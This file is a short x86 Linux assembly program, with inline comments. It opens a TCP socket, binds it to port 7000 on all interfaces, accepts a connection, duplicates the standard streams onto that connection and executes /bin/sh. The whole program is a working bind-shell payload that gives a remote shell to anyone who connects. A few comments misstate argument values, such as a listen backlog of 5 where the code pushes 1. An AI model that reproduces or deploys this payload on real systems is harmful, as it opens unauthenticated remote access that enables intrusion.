BITS 32 SECTION .text ; code section global main ; make label available to linker main: ; SOCKET {{{ xor eax, eax xor ebx, ebx ; socket() args { push byte 6 ; IPPROTO_TCP (=6) push byte 1 ; SOCK_STREAM (=1) push byte 2 ; PF_INET (=2) ; } mov al, 0x66 ; socketcall() inc ebx ; int call = 1 mov ecx, esp ; unsigned long *args = {2, 1, 6} int 0x80 ; }}} mov edi, eax ; save sockfd ; BIND {{{ inc ebx ; int call = 2 ; struct sockaddr_in { cdq push edx ; INADDR_ANY = htonl(0x0) = 0x0 push word 0x581b ; port 7000 = htons(0x1b58) = 0x581b push word bx ; AF_INET = 2 ; } mov ecx, esp ; save pointer to struct ; bind() args { push byte 16 ; socklen_t addrlen push ecx ; const struct sockaddr *my_addr push edi ; int sockfd ; } mov al, 0x66 ; socketcall() mov ecx, esp ; unsigned long *args = {eax, edi, 16} int 0x80 ; }}} ; LISTEN {{{ sal bl, 1 ; int call = 4 (2<<1) ; listen() args { push byte 1 ; int backlog push edi ; int sockfd ; } mov al, 0x66 ; socketcall() mov ecx, esp ; unsigned long *args = {edi, 5} int 0x80 ; }}} ; ACCEPT {{{ inc ebx ; int call = 5 ; eax should be set to zero ; accept() args { push eax ; socklen_t *addrlen push eax ; struct sockaddr *addr push edi ; int sockfd ; } mov al, 0x66 ; socketcall() mov ecx, esp ; unsigned long *args = {fd, 0, 0} int 0x80 ; }}} ; DUP2 {{{ xchg ebx, eax ; int oldfd = client xor ecx, ecx mov cl, 3 ; i=3 l00p: dec ecx ; --i mov al, 0x3f ; dup2() int 0x80 ; dup2(oldfd, i) jnz l00p ; }}} ; EXECVE {{{ ; ecx is already 0 (char *const argv [] = NULL) push ecx push 0x68732f6e ; hs/n push 0x69622f2f ; ib// mov ebx, esp ; const char *filename = esp mov al, 0x0b ; execve() cdq ; char *const envp [] = NULL int 0x80 ; }}} ; EXIT {{{ mov al, 1 ; exit() int 0x80 ; }}}